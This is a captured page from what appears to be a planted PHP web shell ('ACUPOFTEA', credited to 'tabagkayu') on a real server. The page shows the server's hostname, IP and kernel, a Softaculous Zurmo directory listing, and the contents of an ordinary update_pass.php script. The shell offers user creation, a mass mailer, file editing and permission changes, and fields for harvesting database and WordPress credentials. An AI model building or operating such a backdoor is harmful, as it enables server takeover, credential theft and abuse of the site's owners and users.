System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
zurmo
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
update_pass.php
<?php $resp = crypt(md5('[[admin_pass]]'), __genSalt()); echo '<update_pass>'.$resp.'</update_pass>'; function __genSalt($input = null) { if (!$input) { $input = __getRandomBytes(16); } $_identifier = '2y'; if (version_compare(PHP_VERSION, '5.3.7', '<')) { $_identifier = '2a'; } $_iterationCountLog2 = 12; // Hash identifier $identifier = $_identifier; // Cost factor - "4" to "04" $costFactor = chr(ord('0') + $_iterationCountLog2 / 10); $costFactor .= chr(ord('0') + $_iterationCountLog2 % 10); // Salt string $salt = __encode64($input, 16); // $II$CC$SSSSSSSSSSSSSSSSSSSSSS return '$' . $identifier . '$' . $costFactor . '$' . $salt; } function __encode64($input, $count){ $output = ''; $i = 0; $_itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; do { $c1 = ord($input[$i++]); $output .= $_itoa64[$c1 >> 2]; $c1 = ($c1 & 0x03) << 4; if ($i >= $count) { $output .= $_itoa64[$c1]; break; } $c2 = ord($input[$i++]); $c1 |= $c2 >> 4; $output .= $_itoa64[$c1]; $c1 = ($c2 & 0x0f) << 2; $c2 = ord($input[$i++]); $c1 |= $c2 >> 6; $output .= $_itoa64[$c1]; $output .= $_itoa64[$c2 & 0x3f]; } while (1); return $output; } function __getRandomBytes($count){ if (!is_int($count) || $count < 1) { //throw new InvalidArgumentException('Argument must be a positive integer'); } // Try OpenSSL's random generator if (function_exists('openssl_random_pseudo_bytes')) { $strongCrypto = false; $output = openssl_random_pseudo_bytes($count, $strongCrypto); if ($strongCrypto && strlen($output) == $count) { return $output; } } // Try reading from /dev/urandom, if present $output = ''; if (is_readable('/dev/urandom') && ($fh = fopen('/dev/urandom', 'rb'))) { $output = fread($fh, $count); fclose($fh); } // Fall back to a locally generated "random" string if (strlen($output) < $count) { $_randomState = microtime(); $output = ''; for ($i = 0; $i < $count; $i += 16) { $_randomState = md5(microtime() . $_randomState); $output .= md5($_randomState, true); } $output = substr($output, 0, $count); } return $output; } @unlink('update_pass.php'); ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-25 09:44:14
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2024-06-25 09:44:14
php53
DIR
-
drwxr-xr-x
2024-06-25 09:44:14
php56
DIR
-
drwxr-xr-x
2024-06-25 09:44:14
php71
DIR
-
drwxr-xr-x
2024-06-25 09:44:14
php81
DIR
-
drwxr-xr-x
2024-06-25 09:44:14
php82
DIR
-
drwxr-xr-x
2024-06-25 09:44:14
upgrade
DIR
-
drwxr-xr-x
2024-06-25 09:44:14
clone.php
text/x-php
6.21 KB
-rw-r--r--
2024-05-02 09:05:30
debug.php
text/x-php
7.63 KB
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
5.67 KB
-rw-r--r--
2024-05-02 09:05:30
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
extend.php
text/x-php
1.84 KB
-rw-r--r--
2024-05-02 09:05:30
fileindex.php
text/plain
49 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
3.53 KB
-rw-r--r--
2024-05-02 09:05:30
info.xml
text/html
3.42 KB
-rw-r--r--
2024-05-02 06:25:50
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
9.66 KB
-rw-r--r--
2024-05-02 09:05:30
install.xml
text/html
507 B
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
10.46 KB
-rw-r--r--
2024-05-02 09:05:30
notes.txt
text/plain
1.06 KB
-rw-r--r--
2021-12-23 06:54:36
perInstance.php
text/x-php
3.86 KB
-rw-r--r--
2021-12-23 06:54:36
update_pass.php
text/x-php
2.13 KB
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
9.48 KB
-rw-r--r--
2024-05-02 09:05:30
upgrade.xml
text/plain
388 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com